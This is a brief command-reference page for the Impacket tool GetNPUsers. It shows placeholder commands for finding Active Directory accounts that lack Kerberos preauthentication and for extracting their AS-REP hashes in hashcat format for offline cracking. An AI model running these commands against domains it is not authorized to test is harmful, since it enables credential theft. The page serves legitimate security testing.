impacket-getnpusers

finds Active Directory users with "Do not require Kerberos preauthentication"

TLDR

Find AS-REP roastable users

$ impacket-GetNPUsers [domain]/ -dc-ip [dc-ip] -usersfile [users.txt]

Get hash for specific user

$ impacket-GetNPUsers [domain]/[user] -dc-ip [dc-ip] -no-pass

Request with format for hashcat

$ impacket-GetNPUsers [domain]/ -dc-ip [dc-ip] -usersfile [users.txt] -format hashcat

Output to file

$ impacket-GetNPUsers [domain]/ -dc-ip [dc-ip] -usersfile [users.txt] -outputfile [hashes.txt]

SYNOPSIS

impacket-GetNPUsers [options] target

impacket-GetNPUsers finds Active Directory users with "Do not require Kerberos preauthentication" set. Part of the Impacket toolkit. Requests AS-REP tickets that can be cracked offline (AS-REP Roasting). For authorized security testing only.

PARAMETERS

-dc-ip ip

Domain controller IP.

-usersfile file

File with usernames.

-no-pass

Request without password.

-format type

Hash format (hashcat/john).

-outputfile file

Save hashes to file.

impacket-getnpusers

finds Active Directory users with "Do not require Kerberos preauthentication"

TLDR

SYNOPSIS

DESCRIPTION

PARAMETERS

SEE ALSO

> TERMINAL_GEAR

> TERMINAL_GEAR